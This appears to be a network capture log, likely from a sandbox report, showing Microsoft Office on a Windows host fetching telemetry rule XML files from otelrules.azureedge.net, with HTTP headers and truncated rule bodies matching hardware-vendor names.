                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:22 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                            x-ms-request-id: bfc21b6c-401e-0067-2636-2809c2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-r1755647c66ss75qkr31zpy1kc0000000520000000007drt
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:22 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
27 | 192.168.2.4 | 49781 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:22 UTC | 192 | OUT | GET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                            x-ms-request-id: 8ee7b399-e01e-0033-0c50-234695000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-17fbfdc98bbvvplhck7mbap4bw000000075g0000000000c0
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:22 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.4 | 49782 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:22 UTC | 192 | OUT | GET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:22 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                            x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-r1755647c666s72wx0z5rz6s6000000006h0000000001fbe
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:22 UTC | 428 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
29 | 192.168.2.4 | 49779 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:22 UTC | 192 | OUT | GET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                            x-ms-request-id: e2670bef-801e-008f-375d-232c5d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-17fbfdc98bblfj7gw4f18guu2800000006u000000000btua
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:22 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.4 | 49784 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:23 UTC | 192 | OUT | GET /rules/rule120631v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:23 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:23 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B988EBD12"
x-ms-request-id: 546431bf-201e-0085-0b72-2734e3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181223Z-17fbfdc98bbds27mnhu6ftg4d800000003v0000000002yt7
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:23 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
31 | 192.168.2.4 | 49783 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:23 UTC | 192 | OUT | GET /rules/rule120630v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:23 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:23 GMT
Content-Type: text/xml
Content-Length: 499
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
ETag: "0x8DC582B98CEC9F6"
x-ms-request-id: 789f6287-101e-0065-355f-284088000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181223Z-17fbfdc98bb2rxf2hfvcfz540000000003bg000000005hhg
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:23 UTC | 499 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
32 | 192.168.2.4 | 49786 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:23 UTC | 192 | OUT | GET /rules/rule120633v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:23 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:23 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB32BB5CB"
x-ms-request-id: 1089ebf2-001e-0028-530d-27c49f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181223Z-r1755647c666s72wx0z5rz6s6000000006fg000000004d1s
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:23 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
33 | 192.168.2.4 | 49785 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:23 UTC | 192 | OUT | GET /rules/rule120632v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:23 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:23 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5815C4C"
x-ms-request-id: 08308beb-701e-001e-43b0-26f5e6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181223Z-17fbfdc98bbtwz55a8v24wfkdw00000006kg0000000057e4
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:23 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
34 | 192.168.2.4 | 49787 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:23 UTC | 192 | OUT | GET /rules/rule120634v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:23 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:23 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8972972"
x-ms-request-id: ae9ca414-101e-008d-470d-2692e5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181223Z-17fbfdc98bbvvplhck7mbap4bw00000006zg00000000cuk2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:23 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
35          192.168.2.4  49788        13.107.253.45   443

Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:24 UTC  192                OUT        GET /rules/rule120635v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:24 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:24 GMT
Content-Type: text/xml
Content-Length: 420
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DAE3EC0"
x-ms-request-id: 8e3eac93-d01e-0017-759c-27b035000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181224Z-17fbfdc98bb2cvg4m0cmab3ecw000000043000000000a63c
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:24 UTC  420                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


Session ID  Source IP    Source Port  Destination IP  Destination Port
36          192.168.2.4  49789        13.107.253.45   443

Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:24 UTC  192                OUT        GET /rules/rule120636v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:25 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:25 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D43097E"
x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181224Z-17fbfdc98bbvvplhck7mbap4bw0000000750000000000dvm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:25 UTC  472                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
37          192.168.2.4  49791        13.107.253.45   443

Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:24 UTC  192                OUT        GET /rules/rule120638v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:24 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:24 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
ETag: "0x8DC582B92FCB436"
x-ms-request-id: 01fc617d-601e-000d-05a4-262618000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181224Z-r1755647c66w6f6b5182nn0u0400000003v000000000aceu
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:24 UTC  486                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
38          192.168.2.4  49792        13.107.253.45   443

Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:24 UTC  192                OUT        GET /rules/rule120639v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:24 UTC  470                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:24 GMT
Content-Type: text/xml
Content-Length: 423
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
ETag: "0x8DC582BB7564CE8"
x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181224Z-r1755647c66w6f6b5182nn0u0400000003sg00000000h1qa
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:24 UTC  423                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


Session ID  Source IP    Source Port  Destination IP  Destination Port
39          192.168.2.4  49790        13.107.253.45   443

Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:24 UTC  192                OUT        GET /rules/rule120637v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:24 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:24 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
ETag: "0x8DC582BA909FA21"
x-ms-request-id: b953619b-001e-0017-7a89-280c3c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181224Z-r1755647c66hxv26qums8q8fsw00000003g0000000009g0c
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:24 UTC  427                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID  Source IP    Source Port  Destination IP  Destination Port
40          192.168.2.4  49793        13.107.253.45   443

Timestamp                Bytes transferred  Direction  Data
2024-10-28 18:12:25 UTC  192                OUT        GET /rules/rule120640v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:25 UTC  491                IN         HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:25 GMT
Content-Type: text/xml
Content-Length: 478
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
ETag: "0x8DC582B9B233827"
x-ms-request-id: 2044f02f-601e-0001-42eb-25faeb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181225Z-17fbfdc98bbnvkgdqtwd2nmyz8000000048g00000000c3pu
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 478 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            41 | 192.168.2.4 | 49794 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 192 | OUT | GET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                            x-ms-request-id: 2ee95feb-501e-0029-5d17-26d0b8000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-17fbfdc98bb2cvg4m0cmab3ecw000000042g00000000b6ff
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 404 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            42 | 192.168.2.4 | 49796 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 192 | OUT | GET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                            x-ms-request-id: 389326c4-a01e-0053-299b-278603000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-r1755647c66trqwgqbys9wk81g00000003vg00000000fx71
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 468 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            43 | 192.168.2.4 | 49795 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 192 | OUT | GET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                            x-ms-request-id: e7cc90bd-401e-0029-032a-279b43000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-17fbfdc98bbh7l5skzh3rekksc00000006rg00000000bkxf
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 400 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            44 | 192.168.2.4 | 49797 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:25 UTC | 192 | OUT | GET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                            x-ms-request-id: 2399187d-801e-008f-5f67-282c5d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-17fbfdc98bb8lw78ye6qppf97g00000005wg000000007agm
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 479 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            45 | 192.168.2.4 | 49798 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 192 | OUT | GET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 491 | IN | HTTP/1.1 200 OK
